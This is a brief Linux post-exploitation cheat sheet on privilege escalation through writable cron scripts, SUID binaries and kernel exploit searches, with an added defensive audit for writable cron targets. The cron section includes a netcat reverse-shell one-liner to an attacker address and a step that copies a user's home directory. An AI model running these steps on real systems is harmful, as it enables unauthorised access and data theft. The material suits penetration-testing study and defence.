Linux post exploitation
Abusing cron jobs
```bash
cat /var/log/cron.log
grep "CRON" /var/log/syslog
# inspects the cron log file, which can reveal locations of scripts.
# replace the script with:
#!/bin/bash
cp -rf /home/joe/ /var/backups/joe/
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f"
```
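The cron abuse above depends on a scheduled script that a non-root user is able to modify. As an added defensive example (not from the original page), this audit lists every absolute path referenced in a crontab that is group- or world-writable, or that sits in such a directory. The function names and the sample crontab are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original page: audit a crontab for referenced
# files that someone other than the owner could modify or replace.

is_loose() {  # true if $1 is group/world-writable (sticky dirs are excluded)
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) \
            ! -perm -1000 -print 2>/dev/null)" ]
}

audit_cron_file() (   # subshell body: set -f and variables stay local
    file=$1
    set -f            # keep '*' time fields from being glob-expanded
    while IFS= read -r line || [ -n "$line" ]; do
        set -- $line
        case ${1-} in ''|\#*) continue ;; esac   # blank line or comment
        for word in "$@"; do
            case $word in /*) ;; *) continue ;; esac
            [ -f "$word" ] || continue
            if is_loose "$word"; then
                echo "writable-file $word"
            elif is_loose "$(dirname "$word")"; then
                echo "writable-dir $word"
            fi
        done
    done < "$file"
)

make_sample() {  # constructed fixture: one safe script, one world-writable
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$d/rotate.sh"; chmod 755 "$d/rotate.sh"
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 777 "$d/backup.sh"
    printf '%s\n' '# m h dom mon dow user command' \
        "*/5 * * * * root $d/backup.sh" \
        "0 3 * * * root $d/rotate.sh" > "$d/crontab"
    echo "$d"
}

sample=$(make_sample)
audit_cron_file "$sample/crontab"
rm -rf "$sample"
```

On a real host, point `audit_cron_file` at `/etc/crontab` and at each file in `/etc/cron.d`.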
Abusing SUID Binaries
```bash
# find files with the SUID bit; odd ones can be leveraged for privesc with GTFOBins
find / -perm -u=s -type f 2>/dev/null
```
Linux kernel exploits
```bash
cat /etc/issue   # shows OS info
uname -r         # kernel release
arch             # architecture
# Searches for kernel exploits
searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"
```